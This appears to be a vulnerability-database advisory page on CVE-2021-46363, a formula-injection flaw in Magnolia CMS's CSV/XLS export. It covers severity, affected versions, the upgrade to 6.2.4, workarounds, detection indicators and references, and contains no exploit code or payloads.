CVE-2021-46363 – This vulnerability in Magnolia CMS allows attac... (How to Fix)

Q: What is the severity of CVE-2021-46363?

CVE-2021-46363 has a CVSS score of 7.8 (HIGH). This vulnerability in Magnolia CMS allows attackers to inject malicious formulas into exported CSV/XLS files through the Export function. When victims open these files in Microsoft Excel, the formulas can execute arbitrary code on their computers. It affects Magnolia CMS v6.2.3 and earlier versions.

📋 TL;DR

This vulnerability in Magnolia CMS allows attackers to inject malicious formulas into exported CSV/XLS files through the Export function. When victims open these files in Microsoft Excel, the formulas can execute arbitrary code on their computers. It affects Magnolia CMS v6.2.3 and earlier versions.

💻 Affected Systems

Products:

Magnolia CMS

Versions: v6.2.3 and below

Operating Systems: Any OS running Magnolia CMS

Default Config Vulnerable: ⚠️ Yes

Notes: Vulnerability exists in the Export function; exploitation requires Microsoft Excel to open malicious files.

📦 What is this software?

Magnolia Cms by Magnolia Cms

View all CVEs affecting Magnolia Cms →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Remote code execution on victim computers when malicious exported files are opened in Microsoft Excel, potentially leading to full system compromise.

🟠

Likely Case

Data theft, malware installation, or system manipulation through formula injection when users open exported files.

🟢

If Mitigated

Limited impact if users don't open exported files in Excel or if Excel security settings block formula execution.

🌐 Internet-Facing: MEDIUM - Attackers can exploit if they can access the export function, but requires user interaction to open malicious files.

🏢 Internal Only: MEDIUM - Internal users could be targeted through exported files, but still requires user interaction.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires access to export functionality and user interaction to open malicious files.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Magnolia CMS 6.2.4

Vendor Advisory: https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory

Restart Required: Yes

Instructions:

1. Backup your Magnolia instance. 2. Upgrade to Magnolia CMS 6.2.4 or later. 3. Restart the application server. 4. Verify the export function no longer allows formula injection.

🔧 Temporary Workarounds

Disable Export Function

all

Temporarily disable the export functionality in Magnolia CMS to prevent formula injection attacks.

Configure Magnolia to restrict or disable export features in the admin interface

Excel Security Configuration

windows

Configure Microsoft Excel to disable automatic formula execution or run in protected view for downloaded files.

Set Excel security to disable automatic formula execution in Trust Center settings

🧯 If You Can't Patch

Restrict access to export functionality to trusted users only
Educate users to never open exported CSV/XLS files in Microsoft Excel; use text editors or other spreadsheet software instead

🔍 How to Verify

Check if Vulnerable:

Check Magnolia CMS version; if running v6.2.3 or earlier, the system is vulnerable.

Check Version:

Check Magnolia admin interface or application logs for version information

Verify Fix Applied:

After upgrading to v6.2.4 or later, test the export function to ensure formulas cannot be injected into CSV/XLS files.

📡 Detection & Monitoring

Log Indicators:

Unusual export activity patterns
Multiple export requests from single users
Large export file generation

Network Indicators:

Unexpected export file downloads
CSV/XLS files with formula syntax in content

SIEM Query:

source="magnolia" AND (event="export" OR file_type="csv" OR file_type="xls") AND user_agent!="trusted"

📊 Metadata

CVE ID: CVE-2021-46363

CVSS v3 Score: 7.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-1236

Published: February 11, 2022

Last Updated: November 21, 2024

🔗 References

https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory Release Notes,Vendor Advisory
https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46363-Formula%20Injection-Magnolia%20CMS Exploit,Third Party Advisory
https://docs.magnolia-cms.com/product-docs/6.2/Releases/Release-notes-for-Magnolia-CMS-6.2.4.html#_security_advisory Release Notes,Vendor Advisory
https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2021-46363-Formula%20Injection-Magnolia%20CMS Exploit,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-46363, you might also want to check these: